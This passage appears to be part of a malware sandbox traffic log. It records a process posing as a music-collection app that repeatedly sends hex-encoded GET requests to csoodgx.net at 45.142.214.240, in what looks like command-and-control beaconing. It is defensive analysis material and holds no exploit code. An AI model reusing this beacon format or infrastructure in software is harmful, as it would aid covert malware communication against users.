                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:51.380537033 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49720 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:51.717952967 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:52.015934944 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
Mar 29, 2024 12:09:52.123640060 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:52.426903963 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49721 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:52.762234926 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:53.057368994 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49722 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:53.388422012 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:53.693662882 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:53 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49723 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:54.033443928 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:54.343990088 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
Mar 29, 2024 12:09:54.451755047 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:54.752840042 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49724 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:55.106878996 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:55.416470051 CET | 220 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:55 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49725 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:55.746984959 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:56.042346954 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:55 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49726 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:56.395343065 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:56.701100111 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:09:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:09:56.811413050 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:57.108319044 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:09:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:09:57.218725920 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:57.524729013 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:09:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49727 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:57.862262964 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:58.170133114 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:09:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:09:58.280004025 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:58.582115889 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:09:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49728 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:58.919317007 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:59.228439093 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:09:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49729 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:09:59.565418959 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:09:59.866986990 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:09:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49730 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:00.203382969 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:00.509139061 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49731 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:00.843890905 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:01.151525974 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:01.265583038 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:01.564882994 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49732 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:01.908488035 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:02.220505953 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:02.326673985 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:02.638163090 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49733 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:02.989419937 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:03.301316977 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49734 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:03.645339966 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:03.945609093 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49735 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:04.284502029 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:04.595429897 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49736 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:04.939735889 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:05.244760990 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49737 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:05.594232082 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
    Host: csoodgx.net
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:05.892684937 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Fri, 29 Mar 2024 11:10:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49738 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
Timestamp | Bytes transferred | Direction | Data
